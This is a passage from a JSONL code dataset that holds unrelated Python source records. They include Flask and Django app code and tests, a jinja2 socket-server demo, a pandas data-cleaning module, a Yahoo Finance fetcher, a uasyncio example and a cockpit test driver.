unauthorized_hook.send()\n raise Unauthorized\n\n\n@unauthorized_hook.connect\ndef sinal_nao_autorizado(identity=None,**kwargs):\n return print(\"Sinal de LOGIN NAO AUTORIZADO enviado\")\n","sub_path":"swagger_server/configuration/context_handler.py","file_name":"context_handler.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"25590762","text":"import model\r\nimport repository\r\n\r\n\r\ndef insert_bookmark(session):\r\n session.execute(\r\n \"INSERT INTO bookmarks (id, title, url, notes, date_added)\"\r\n ' VALUES (5,\"google5\",\"https://www.google5.com/\",\"google5 website\", \"2021-03-24 03:56:33.961691\")'\r\n )\r\n [[bookmark_url]] = session.execute(\r\n \"SELECT url FROM bookmarks WHERE url=:url \",\r\n dict(url=\"https://www.google5.com/\"),\r\n )\r\n return bookmark_url\r\n\r\n\r\ndef test_repository_can_save_a_bookmark(session):\r\n bookmark = model.Bookmark(6,\"google6\",\"https://www.google6.com/\",\"google6 website\", \"2021-03-24 03:56:33.961691\")\r\n\r\n repo = repository.SqlAlchemyRepository(session)\r\n repo.add(bookmark)\r\n session.commit()\r\n\r\n rows = session.execute(\r\n 'SELECT id, title, url, notes, date_added FROM \"bookmarks\"'\r\n )\r\n assert list(rows) == [(6,\"google6\",\"https://www.google6.com/\",\"google6 website\", \"2021-03-24 03:56:33.961691\")]\r\n\r\n\r\n","sub_path":"barky_flask_1/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"26210082","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = \"Q1mi\"\n# Date: 2017/8/25\n\n\"\"\"\njinja2演示示例\n\"\"\"\n\nimport socket\n\nimport pymysql\n\n\ndef f1():\n conn = pymysql.connect(host=\"127.0.0.1\", port=3306, user=\"root\", passwd=\"root1234\", db=\"TEST1\")\n cursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n cursor.execute(\"select uid, name, department_id from userinfo\")\n user_list = cursor.fetchall()\n cursor.close()\n conn.close()\n print(user_list)\n\n with open(\"jinja2示例.html\") as f:\n source_data = f.read()\n\n # 使用jinja2模板渲染\n from jinja2 import Template\n template = Template(source_data)\n data = template.render(user_list=user_list)\n\n return data\n\n\ndef f2():\n return \"ooo->f2\"\n\n\nrouters = [\n (\"/jinja2\", f1),\n (\"/ooo\", f2),\n]\n\n\ndef run():\n s = socket.socket()\n s.bind((\"127.0.0.1\", 8080))\n s.listen(5)\n while True:\n conn, addr = s.accept() # 暂时挂起\n data = conn.recv(8096)\n data = str(data, encoding=\"utf-8\")\n head, body = data.split(\"\\r\\n\\r\\n\")\n value_list = head.split(\"\\r\\n\")\n method, url, protocal = value_list[0].split(\" \")\n\n conn.send(b\"HTTP/1.1 200 OK\\r\\n\\r\\n\")\n\n func_name = None\n for i in routers:\n if i[0] == url:\n func_name = i[1]\n break # 找到一个不需要往下找了\n if func_name: # 如果有这个函数\n response = func_name()\n else:\n response = \"404\"\n\n conn.send(bytes(response, encoding=\"UTF-8\"))\n conn.close()\n\n\nif __name__ == '__main__':\n run()","sub_path":"about_django/Web框架/jinja2渲染示例.py","file_name":"jinja2渲染示例.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396048137","text":"from Midas.databases import mongo_to_df, load_df_to_postgres, MongoInterface\nfrom Midas.configs import default_db, raw_data_collection\n\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\n\n\ndef remove_row_with_missing(df):\n return df.dropna()\n\n\ndef remove_col_with_no_data(df):\n to_drop = []\n for col in df.columns:\n # determine if there's only 1 unique value\n if df[col].nunique() == 1:\n to_drop.append(col)\n\n return df.drop(to_drop, axis=\"columns\")\n\n\ndef impute_numeric(series, strategy):\n def _impute_to_mean(series):\n return series.fillna(value=series.mean())\n\n def _impute_to_median(series):\n return series.fillna(value=series.median())\n\n if strategy == \"mean\":\n return _impute_to_mean(series)\n elif strategy == \"median\":\n return _impute_to_median(series)\n else:\n return None\n\n\ndef impute_categorical(series, strategy):\n def _impute_to_missing(series):\n return series.fillna(value=\"missing\")\n\n if strategy == \"fill_with_missing\":\n return _impute_to_missing(series)\n else:\n return None\n\n\ndef imputation(df, label_mapping, numeric_strategy, categorical_strategy):\n if label_mapping:\n for col in df.columns:\n if col in label_mapping[\"numeric\"]:\n df[col] = impute_numeric(df[col], numeric_strategy)\n elif col in label_mapping[\"categorical\"]:\n df[col] = impute_categorical(df[col], categorical_strategy)\n return df\n\n\ndef clean_training_data(filepath, standardize, outliers, variance_retained, label_mapping, numeric_strategy, categorical_strategy):\n df = pd.read_csv(filepath)\n\n if not numeric_strategy:\n numeric_strategy = \"mean\"\n if not categorical_strategy:\n categorical_strategy = \"fill_with_missing\"\n\n return clean_data(df, label_mapping, numeric_strategy, categorical_strategy, outliers, standardize, variance_retained)\n\ndef clean_data(\n df,\n label_mapping,\n # numeric_strategy=\"mean\",\n # categorical_strategy=\"fill_with_missing\",\n numeric_strategy,\n categorical_strategy,\n outliers=None,\n standardize=None,\n variance_retained=0,\n):\n\n # cleaning process\n\n # force datatypes for categorical data to str\n for features in label_mapping[\"categorical\"]:\n df[features] = df[features].astype(str)\n\n df = remove_outliers(df, outliers)\n\n df = standardize_numeric_features(df, label_mapping[\"numeric\"], standardize)\n\n df = imputation(df, label_mapping, numeric_strategy, categorical_strategy)\n\n # this step breaks the data cleaning process\n # df = dimensionality_reduction_using_PCA(df, variance_retained)\n\n return df\n\n\n# Removes outliers in numeric features outside of (Q1 - 1.5 * IQR, Q3 + 1.5 * IQR)\n# When argument outliers is set to 'obs', the entire row (observation) is removed\n# When argument 'outliers is set to 'value', the outlier value is recoded to missing\n\n# Use: outliers = None obs value\ndef remove_outliers(in_df, outliers):\n in_data = in_df.copy()\n if outliers:\n features = list(in_data)\n for feature in features:\n if is_numeric_dtype(in_data[feature]) and in_data[feature].nunique() > 2:\n # get bounds\n sorted_feature = sorted(in_data[feature])\n q1, q3 = np.percentile(sorted_feature, [25, 75])\n iqr = q3 - q1\n lower_bound = q1 - (1.5 * iqr)\n upper_bound = q3 + (1.5 * iqr)\n if (outliers) == \"obs\":\n in_data.drop(\n in_data[in_data[feature] < lower_bound].index, inplace=True\n )\n in_data.drop(\n in_data[in_data[feature] > upper_bound].index, inplace=True\n )\n elif (outliers) == \"value\":\n in_data.loc[in_data[feature] < lower_bound, feature] = np.nan\n in_data.loc[in_data[feature] > upper_bound, feature] = np.nan\n return in_data\n\n\n# Standardizes all numeric features such that each feature mean = 0 and variance = 1\ndef standardize_numeric_features(in_df, columns, standardize):\n in_data = in_df.copy()\n if standardize:\n scaler = preprocessing.StandardScaler()\n for feature in columns:\n try:\n # we might have removed a column as useless\n if is_numeric_dtype(in_data[feature]) and in_data[feature].nunique() > 2:\n in_data[feature] = scaler.fit_transform(in_data[feature].to_frame())\n except KeyError:\n pass\n return in_data\n\n\n# Uses PCA to reduce the dimensionality of the numeric features. The original\n# numeric features are dropped and replaced by a set of new principal components\n# The number of components selected are the minimum needed to ensure that\n# at least x 'variance explained' is retained. In other words, 30 components might be\n# required to ensure that .95 of the variance in the original set of 100 features is\n# retained\n# NOTE: PCA requires imputed data (no missing)\n\n# Use: variance_retained = .95. 0 means don't use PCA. use original.\n\n# FIXME-Ellen:\n# getting error -> Midas/data_cleaning.py:162:17: F821 undefined name 'nonpca_features_df'\ndef dimensionality_reduction_using_PCA(in_df, variance_retained):\n in_data = in_df.copy()\n if variance_retained > 0:\n features = list(in_data)\n scaler = preprocessing.StandardScaler()\n pca = PCA(variance_retained)\n pca_df = pd.DataFrame(index=in_data.index)\n for feature in features:\n if is_numeric_dtype(in_data[feature]) and in_data[feature].nunique() > 2:\n pca_df[feature] = scaler.fit_transform(in_data[feature].to_frame())\n else:\n nonpca_features_df[feature] = in_data[feature]\n pca.fit(pca_df)\n pca_df = pca.transform(pca_df)\n print(\"number of components = \", pca.n_components_)\n return pd.concat([nonpca_features_df, pca_df], axis=1)\n else:\n return in_data\n\n\n# def suggest_dtypes(collection, db=\"raw_data\"):\n\n# mongo_conn = MongoClient(**mongo_connection_info)\n# df = mongo_to_df(mongo_conn[db], collection)\n# # Do analysis here to suggest type labels for features\n# return {\n\n# }\n\n\n\"\"\" TESTING\n\ntrain_transaction = pd.read_csv('train_transaction.csv', index_col=0)\ntrain_id = pd.read_csv('train_identity.csv', index_col=0)\nin_df = train_transaction.merge(\n train_id, how='left', left_on='TransactionID', right_on='TransactionID')\n\n\n#a = remove_outliers(in_df,'obs')\n#b = remove_outliers(in_df,'values')\n#c = standardize_numeric_features(in_df)\n#d = dimensionality_reduction_using_PCA(in_df, .95)\n\n# initialize list of lists\ndata = [[3, 10, 5],\n [5, 15, 6],\n [2, 99, 3],\n [3, 11, 4],\n [3, 13, 3],\n [5, 14, 5],\n [3, 10, 5],\n [-10, 15, 6],\n [2, 14, 3],\n [3, 11, 4],\n [3, 13, 3],\n [5, 14, 5]\n ]\n\n# Create the pandas DataFrame\ndf = pd.DataFrame(data, columns = ['a', 'b', 'c'])\n\nremove_outliers(df, 'obs')\n\nstandardize_numeric_features(df)\n\ndimensionality_reduction_using_PCA(df, .95)\n\"\"\"\n","sub_path":"Midas/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":7308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"139853487","text":"from __future__ import absolute_import, unicode_literals\n\nimport json\n\nfrom dateutil.relativedelta import relativedelta\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.test.utils import override_settings\nfrom django.utils import timezone\nfrom mock import patch\nfrom temba.types import Contact as TembaContact, Group as TembaGroup\nfrom tracpro.contacts.models import Contact\nfrom tracpro.groups.models import Region, Group\nfrom tracpro.polls.models import Issue, Response, RESPONSE_COMPLETE, RESPONSE_PARTIAL, RESPONSE_EMPTY\nfrom tracpro.test import TracProTest\n\n\nclass RegionTest(TracProTest):\n def test_create(self):\n zabul = Region.create(self.unicef, \"Zabul\", 'G-101')\n jan = self.create_contact(self.unicef, \"Jan\", 'tel:1234', zabul, self.group1, 'C-101')\n bob = User.create(self.unicef, \"Bob\", \"bob@unicef.org\", \"pass\", False, [zabul])\n\n self.assertEqual(zabul.org, self.unicef)\n self.assertEqual(zabul.name, \"Zabul\")\n self.assertEqual(zabul.uuid, 'G-101')\n self.assertEqual(list(zabul.get_contacts()), [jan])\n self.assertEqual(list(zabul.get_users()), [bob])\n\n def test_get_all(self):\n self.assertEqual(len(Region.get_all(self.unicef)), 3)\n self.assertEqual(len(Region.get_all(self.nyaruka)), 1)\n\n @override_settings(CELERY_ALWAYS_EAGER=True, CELERY_EAGER_PROPAGATES_EXCEPTIONS=True, BROKER_BACKEND='memory')\n @patch('dash.orgs.models.TembaClient.get_groups')\n @patch('dash.orgs.models.TembaClient.get_contacts')\n def test_sync_with_groups(self, mock_get_contacts, mock_get_groups):\n mock_get_groups.return_value = [TembaGroup.create(uuid='G-101', name=\"New region\", size=2),\n TembaGroup.create(uuid='G-102', name=\"Other region\", size=1)]\n mock_get_contacts.return_value = [\n TembaContact.create(uuid='C-101', name=\"Jan\", urns=['tel:123'], groups=['G-101', 'G-005'],\n fields=dict(chat_name=\"jan\"), language='eng', modified_on=timezone.now()),\n TembaContact.create(uuid='C-102', name=\"Ken\", urns=['tel:234'], groups=['G-101', 'G-006'],\n fields=dict(chat_name=\"ken\"), language='eng', modified_on=timezone.now())\n ]\n\n # select one new group\n Region.sync_with_groups(self.unicef, ['G-101'])\n self.assertEqual(self.unicef.regions.filter(is_active=True).count(), 1)\n self.assertEqual(self.unicef.regions.filter(is_active=False).count(), 3) # existing de-activated\n\n new_region = Region.objects.get(uuid='G-101')\n self.assertEqual(new_region.name, \"New region\")\n self.assertTrue(new_region.is_active)\n\n # check contact changes\n self.assertEqual(self.unicef.contacts.filter(is_active=True).count(), 2)\n self.assertEqual(self.unicef.contacts.filter(is_active=False).count(), 5) # existing de-activated\n\n jan = Contact.objects.get(uuid='C-101')\n self.assertEqual(jan.name, \"Jan\")\n self.assertEqual(jan.urn, 'tel:123')\n self.assertEqual(jan.region, new_region)\n self.assertTrue(jan.is_active)\n\n # change group and contacts on chatpro side\n Region.objects.filter(name=\"New region\").update(name=\"Huh?\", is_active=False)\n jan.name = \"Janet\"\n jan.save()\n Contact.objects.filter(name=\"Ken\").update(is_active=False)\n\n # re-select new group\n Region.sync_with_groups(self.unicef, ['G-101'])\n\n # local changes should be overwritten\n self.assertEqual(self.unicef.regions.get(is_active=True).name, 'New region')\n self.assertEqual(self.unicef.contacts.filter(is_active=True).count(), 2)\n Contact.objects.get(name=\"Jan\", is_active=True)\n\n\nclass GroupTest(TracProTest):\n def test_create(self):\n group = Group.create(self.unicef, \"Male Teachers\", 'G-101')\n self.assertEqual(group.org, self.unicef)\n self.assertEqual(group.name, \"Male Teachers\")\n self.assertEqual(group.uuid, 'G-101')\n\n def test_get_all(self):\n self.assertEqual(len(Group.get_all(self.unicef)), 3)\n self.assertEqual(len(Group.get_all(self.nyaruka)), 1)\n\n\nclass RegionCRUDLTest(TracProTest):\n def test_list(self):\n url = reverse('groups.region_list')\n\n # log in as a non-administrator\n self.login(self.user1)\n\n response = self.url_get('unicef', url)\n self.assertRedirects(response, 'http://unicef.localhost/users/login/?next=/region/')\n\n # log in as an administrator\n self.login(self.admin)\n\n response = self.url_get('unicef', url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context['object_list']), 3)\n\n def test_most_active(self):\n url = reverse('groups.region_most_active')\n\n five_weeks_ago = timezone.now() - relativedelta(weeks=5)\n five_days_ago = timezone.now() - relativedelta(days=5)\n issue = Issue.objects.create(poll=self.poll1, conducted_on=five_weeks_ago)\n\n # empty response in last month for contact in region #1\n Response.objects.create(flow_run_id=123, issue=issue, contact=self.contact1,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_EMPTY)\n\n # partial response not in last month for contact in region #2\n Response.objects.create(flow_run_id=234, issue=issue, contact=self.contact4,\n created_on=five_weeks_ago, updated_on=five_weeks_ago, status=RESPONSE_PARTIAL)\n\n # partial response in last month for contact in region #2\n Response.objects.create(flow_run_id=345, issue=issue, contact=self.contact4,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_PARTIAL)\n\n # 2 complete responses in last month for contact in region #3\n Response.objects.create(flow_run_id=456, issue=issue, contact=self.contact5,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_COMPLETE)\n Response.objects.create(flow_run_id=567, issue=issue, contact=self.contact5,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_COMPLETE)\n\n # log in as a non-administrator\n self.login(self.user1)\n\n response = self.url_get('unicef', url)\n results = json.loads(response.content)['results']\n self.assertEqual(len(results), 2)\n self.assertEqual(results[0]['id'], self.region3.pk)\n self.assertEqual(results[0]['name'], self.region3.name)\n self.assertEqual(results[0]['response_count'], 2)\n self.assertEqual(results[1]['id'], self.region2.pk)\n self.assertEqual(results[1]['name'], self.region2.name)\n self.assertEqual(results[1]['response_count'], 1)\n\n\nclass GroupCRUDLTest(TracProTest):\n def test_list(self):\n url = reverse('groups.group_list')\n\n # log in as a non-administrator\n self.login(self.user1)\n\n response = self.url_get('unicef', url)\n self.assertRedirects(response, 'http://unicef.localhost/users/login/?next=/group/')\n\n # log in as an administrator\n self.login(self.admin)\n\n response = self.url_get('unicef', url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context['object_list']), 3)\n\n def test_most_active(self):\n url = reverse('groups.group_most_active')\n\n five_weeks_ago = timezone.now() - relativedelta(weeks=5)\n five_days_ago = timezone.now() - relativedelta(days=5)\n issue = Issue.objects.create(poll=self.poll1, conducted_on=five_weeks_ago)\n\n # empty response in last month for contact in group #1\n Response.objects.create(flow_run_id=123, issue=issue, contact=self.contact1,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_EMPTY)\n\n # partial response not in last month for contact in group #2\n Response.objects.create(flow_run_id=234, issue=issue, contact=self.contact3,\n created_on=five_weeks_ago, updated_on=five_weeks_ago, status=RESPONSE_PARTIAL)\n\n # partial response in last month for contact in group #2\n Response.objects.create(flow_run_id=345, issue=issue, contact=self.contact3,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_PARTIAL)\n\n # 2 complete responses in last month for contact in group #3\n Response.objects.create(flow_run_id=456, issue=issue, contact=self.contact5,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_COMPLETE)\n Response.objects.create(flow_run_id=567, issue=issue, contact=self.contact5,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_COMPLETE)\n\n # log in as a non-administrator\n self.login(self.user1)\n\n response = self.url_get('unicef', url)\n results = json.loads(response.content)['results']\n self.assertEqual(len(results), 2)\n self.assertEqual(results[0]['id'], self.group3.pk)\n self.assertEqual(results[0]['name'], self.group3.name)\n self.assertEqual(results[0]['response_count'], 2)\n self.assertEqual(results[1]['id'], self.group2.pk)\n self.assertEqual(results[1]['name'], self.group2.name)\n self.assertEqual(results[1]['response_count'], 1)\n\n\nclass UserRegionsMiddlewareTest(TracProTest):\n def test_process_request(self):\n # make anonymous request to home page\n response = self.url_get('unicef', reverse('home.home'))\n self.assertEqual(response.status_code, 302)\n\n # admin user with implicit access to all regions\n self.login(self.admin)\n\n # default to \"All Regions\"\n response = self.url_get('unicef', reverse('home.home'))\n self.assertIsNone(self.client.session['region'])\n\n # check region menu...\n self.assertContains(response, \"Kandahar\", status_code=200)\n self.assertContains(response, \"Khost\")\n self.assertContains(response, \"Kunar\")\n self.assertContains(response, \"All Regions\")\n\n # should come from session this time\n self.url_get('unicef', reverse('home.home'))\n self.assertIsNone(self.client.session['region'])\n\n # any page allows region to be set via _region param\n self.url_get('unicef', reverse('home.home'), {'_region': self.region3.pk})\n self.assertEqual(self.client.session['region'], self.region3.pk)\n\n # can set to region to 0 meaning \"All Regions\"\n self.url_get('unicef', reverse('home.home'), {'_region': 0})\n self.assertIsNone(self.client.session['region'])\n\n # user with access to 2 regions (#2 and #3)\n self.login(self.user2)\n\n # default to first region A-Z\n response = self.url_get('unicef', reverse('home.home'))\n self.assertEqual(self.client.session['region'], self.region2.pk)\n\n # check region menu...\n self.assertContains(response, \"Khost\", status_code=200)\n self.assertContains(response, \"Kunar\")\n self.assertNotContains(response, \"All Regions\")\n\n # can't set to region that user doesn't have access, so defaults back to first\n self.url_get('unicef', reverse('home.home'), {'_region': self.region1.pk})\n self.assertEqual(self.client.session['region'], self.region2.pk)\n\n # user with access to only 1 region\n self.login(self.user1)\n\n # user only has access to region #1 so should default to region #1\n response = self.url_get('unicef', reverse('home.home'))\n self.assertEqual(self.client.session['region'], self.region1.pk)\n\n # no region menu, just region name\n self.assertContains(response, \"Kandahar\", status_code=200)\n self.assertNotContains(response, \"All Regions\")\n","sub_path":"tracpro/groups/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":12019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"454397992","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\djutil\\context_processors.py\n# Compiled at: 2013-08-27 09:18:22\nfrom __future__ import unicode_literals\nfrom django.conf import settings\nfrom django.utils import dateformat\n\ndef analytics(request):\n return {b'ga_tracking_id': getattr(settings, b'GA_TRACKING_ID', b''), \n b'ga_tracking_domain': getattr(settings, b'GA_TRACKING_DOMAIN', b'')}\n\n\ndef version_string(request):\n revision_hash = getattr(settings, b'REVISION_HASH', b'')\n revision_date = getattr(settings, b'REVISION_DATE', b'')\n if revision_date:\n try:\n revision_date = dateformat.format(revision_date, b'j M, G:i')\n except:\n revision_date = b''\n\n revision_env = getattr(settings, b'REVISION_ENV', b'')\n if revision_env:\n revision_env = b', ' + revision_env\n if revision_hash and revision_date:\n version = (b'v. {} ({}{})').format(revision_date, revision_hash, revision_env)\n else:\n version = b''\n return {b'VERSION_STRING': version}","sub_path":"pycfiles/djutil-0.2-py2.7/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"650720202","text":"import urllib2\nimport csv\nimport time\nimport random_stock_tickers\nimport controller\n\nclass YahooFinanceAPIHandler():\n\n def __init__(self, stock_tickers_list, stats_wanted_list):\n self.stock_tickers_list = stock_tickers_list\n self.stats_wanted_list = stats_wanted_list\n self.stat_dict = {\"ask\":\"a\",\n \"average_daily_volume\":\"a2\",\n \"bid\":\"b\",\n \"previous_close\":\"p\",\n \"open\":\"o\",\n \"day_low\":\"g\",\n \"day_high\":\"h\",\n \"day_value_change\":\"w4\",\n \"last_trade\":\"l1\",\n \"last_trade_date\":\"d1\",\n \"last_trade_time\":\"t1\",\n \"52_week_high\":\"k\",\n \"52_week_low\":\"j\",\n \"52_week_range\":\"w\",\n \"dividend_yield\":\"y\",\n \"dividend_per_share\":\"d\",\n \"dividend_pay_date\":\"r1\",\n \"ex_dividend_date\":\"q\",\n \"market_cap\":\"j1\",\n \"name\":\"n\",\n \"revenue\":\"s6\",\n \"symbol\":\"s\",\n \"stock_exchange\":\"x\",\n \"shares_outstanding\":\"j2\",\n \"eps\":\"e\",\n \"ebitda\":\"j4\",\n \"pe\":\"r\"\n }\n\n def create_url(self):\n stock_tickers = self.stock_tickers_list\n stats_wanted_list = self.stats_wanted_list\n stat_dict = self.stat_dict\n url = \"http://finance.yahoo.com/d/quotes.csv?s=\"\n for ticker in stock_tickers:\n if ticker != stock_tickers[-1]:\n url += ticker + \"+\"\n else:\n url += ticker + \"&f=\"\n for stat in stats_wanted_list:\n url += stat_dict[stat]\n return url\n\n def get_unvalidated_stock_table(self):\n url = self.create_url()\n table = []\n while controller.Controller().can_connect_to_url(url) == False:\n time.sleep(60)\n response = urllib2.urlopen(url)\n document = csv.reader(response)\n for row in document:\n table.append(row)\n response.close()\n return table\n\n #this function invalidates a row if ALL entries == \"N/A\"\n \"\"\"def create_validated_table(self):\n unvalidated_table = self.get_unvalidated_stock_table()\n invalid_rows = []\n modified_table = []\n for row in unvalidated_table:\n match_count = 0\n for entry in row:\n if entry == \"N/A\":\n match_count += 1\n if match_count == len(row) - 1:\n invalid_rows.append(row)\n for row in unvalidated_table:\n if row not in invalid_rows:\n modified_table.append(row)\n return modified_table\"\"\"\n\n #this functions invalidates a row if ANY of the entries == \"N/A\"\n def create_validated_table(self):\n unvalidated_table = self.get_unvalidated_stock_table()\n invalid_rows = []\n modified_table = []\n for row in unvalidated_table:\n for entry in row:\n if entry == \"N/A\":\n invalid_rows.append(row)\n for row in unvalidated_table:\n if row not in invalid_rows:\n modified_table.append(row)\n return modified_table\n\n #create_formatted_data returns stock data in a readable format\n def create_formatted_data(self):\n validated_table = self.create_validated_table()\n stats_wanted = self.stats_wanted_list\n text = \"\"\n for row in validated_table:\n for i in range(0, len(stats_wanted)):\n text += stats_wanted[i].upper().replace(\"_\",\" \") + \": \" + row[i].upper() + \"\\n\"\n text += \"\\n\"\n return text\n","sub_path":"yahoo_finance_api_handler.py","file_name":"yahoo_finance_api_handler.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"554921848","text":"import uasyncio as asyncio\nfrom uasyncio import Event\n\nasync def waiter(event):\n print('Waiting for event')\n await event.wait() # Pause here until event is set\n print('Waiter got event.')\n event.clear() # Flag caller and enable re-use of the event\n\nasync def main():\n event = Event()\n asyncio.create_task(waiter(event))\n await asyncio.sleep(2)\n print('Setting event')\n event.set()\n await asyncio.sleep(1)\n # Caller can check if event has been cleared\n print('Event is {}'.format('set' if event.is_set() else 'clear'))\n\nasyncio.run(main())","sub_path":"Experimental_exercise/uasyncio_test/3.2 Event.py","file_name":"3.2 Event.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"135211199","text":"import threading\nimport queue\nfrom CreateBluePrint import CreateBluePrint\nfrom RequestCockpitAPI import RequestCockpitAPI\nfrom cockpit_testing.Framework.utils.utils import BaseTest\nimport time, traceback, sys\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-b', help='Run list of blueprints', dest='bpName', action='store', default=[], nargs='+')\n parser.add_argument('-d', help='Run blueprints in a specific directory', dest='bpDirectory', default='', action='store')\n parser.add_argument('-a', help='Use a specific account', dest='account', default='', action='store')\n parser.add_argument('--clone', help=\"Clone blueprints templates' repo\", dest='clone', default=False, action='store_true')\n parser.add_argument('--teardown', help='Delete the account', dest='teardown', default=False, action='store_true')\n parser.add_argument('--no-backend', help='No backend environment', dest='no_backend', default=False,\n action='store_true')\n options = parser.parse_args()\n\n print(' [*] Driver is running ..... ')\n base_test = BaseTest()\n base_test.log('Driver.log')\n base_test.check_cockpit_is_exist()\n\n THREADS_NUMBER = int(base_test.values['threads_number'])\n BLUEPRINT_NAME = options.bpName\n\n create_blueprint = CreateBluePrint(clone=options.clone, no_backend=options.no_backend, bp_dir=options.bpDirectory)\n if options.account:\n create_blueprint.values['account'] = options.account\n elif not options.no_backend:\n create_blueprint.create_account()\n\n create_blueprint.create_blueprint()\n role = {} # {'Thread_name : [ [role_name, service], [role_name, service], .. ]}\n\n\n def get_testService_role(blueprint, thread_name):\n global role\n index = []\n blueprint = blueprint.splitlines()\n for line in blueprint:\n if 'test_' == line[:5]:\n index.append(blueprint.index(line))\n\n if len(index) == 0:\n raise NameError(\"The blueprint doesn't have any test roles.\")\n\n role[thread_name] = []\n for i in index:\n role_line = blueprint[i]\n role_name = role_line[:role_line.find('__')]\n role_service = role_line[role_line.find('__') + 2:-1]\n role[thread_name].append([role_name, role_service])\n\n\n queue = queue.Queue()\n jobs = base_test.get_jobs(BLUEPRINT_NAME)\n for job in jobs:\n queue.put(job)\n\n\n def work():\n while not queue.empty():\n testCasesPath = queue.get()\n bpFileName = testCasesPath[testCasesPath.index('/TestCases/') + 11:]\n print(('\\n [*] Test case : %s' % bpFileName))\n base_test.logging.info('\\n')\n base_test.logging.info('[*] Test case : %s' % bpFileName)\n\n try:\n blueprint = create_blueprint.load_blueprint(testCasesPath=testCasesPath)\n get_testService_role(blueprint=blueprint, thread_name=threading.current_thread().name)\n request_cockpit_api = RequestCockpitAPI()\n request_cockpit_api.create_new_repository(repository=request_cockpit_api.repo['name'])\n request_cockpit_api.send_blueprint(repository=request_cockpit_api.repo['name'],\n blueprint=blueprint)\n\n request_cockpit_api.execute_blueprint(repository=request_cockpit_api.repo['name'],\n blueprint=request_cockpit_api.blueprint['name'])\n request_cockpit_api.run_repository(repository=request_cockpit_api.repo['name'])\n\n testCase_time = request_cockpit_api.get_run_status(repository=request_cockpit_api.repo['name'],\n run_key=request_cockpit_api.repo['key'],\n bpFileName=bpFileName)\n if testCase_time:\n base_test.Testcases_results[bpFileName] = []\n base_test.Testcases_results[bpFileName].append(['TestCase Time', testCase_time])\n for role_item in role[threading.current_thread().name]:\n base_test.Testcases_results[\n bpFileName].append(request_cockpit_api.get_service_data(\n repository=request_cockpit_api.repo['name'],\n role=role_item[0],\n service=role_item[1]))\n else:\n request_cockpit_api.testcase_time = '{:0.2f}'.format(time.time() - request_cockpit_api.start_time)\n error_message = 'ERROR : %s %s' % (\n request_cockpit_api.blueprint['name'], request_cockpit_api.blueprint['log'])\n base_test.Testcases_results[bpFileName] = [['TestCase Time', request_cockpit_api.testcase_time],\n [error_message, role[threading.current_thread().name][0]]]\n except:\n base_test.logging.error(traceback.format_exc())\n\n # Add error message to xml result\n error_message = 'ERROR : %s %s' % (traceback.format_exc(), request_cockpit_api.response_error_content)\n base_test.Testcases_results[bpFileName] = [['TestCase Time', 0], [error_message, 'Unknown service']]\n\n request_cockpit_api.clean_cockpit()\n queue.task_done()\n\n\n for _ in range(THREADS_NUMBER):\n threading.Thread(target=work).start()\n\n queue.join()\n base_test.generate_xml_results()\n if options.teardown:\n create_blueprint.teardown()\n","sub_path":"cockpit_testing/Framework/Driver/Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"470530314","text":"import gym\nimport os\nfrom time import sleep\nfrom evolutionary_algorithm.ea.eamain import ConvolutionalNeuralNetwork, SimpleNeuralNetwork\nfrom evolutionary_algorithm.ea.gym_wrapper import RamGymWrapper, MainGymWrapper\nENV_NAME = \"SpaceInvaders-ramNoFrameskip-v4\"\nRAM = True\nMODEL_USED = \"SIMPLE\"\nLOAD_WEIGHTS_PATH = str(os.path.dirname(__file__) + \"/models/\" + ENV_NAME + \"/\" + \"2020-02-20_04-35\" + \"-model.h5\")\n\n\nif RAM:\n env = RamGymWrapper.wrap(gym.make(ENV_NAME))\nelse:\n env = MainGymWrapper.wrap(gym.make(ENV_NAME))\n\nif MODEL_USED == \"SIMPLE\":\n model = SimpleNeuralNetwork((4, 128), env.action_space.n, filepath=LOAD_WEIGHTS_PATH)\nelse:\n model = ConvolutionalNeuralNetwork((4, 84, 84), env.action_space.n, 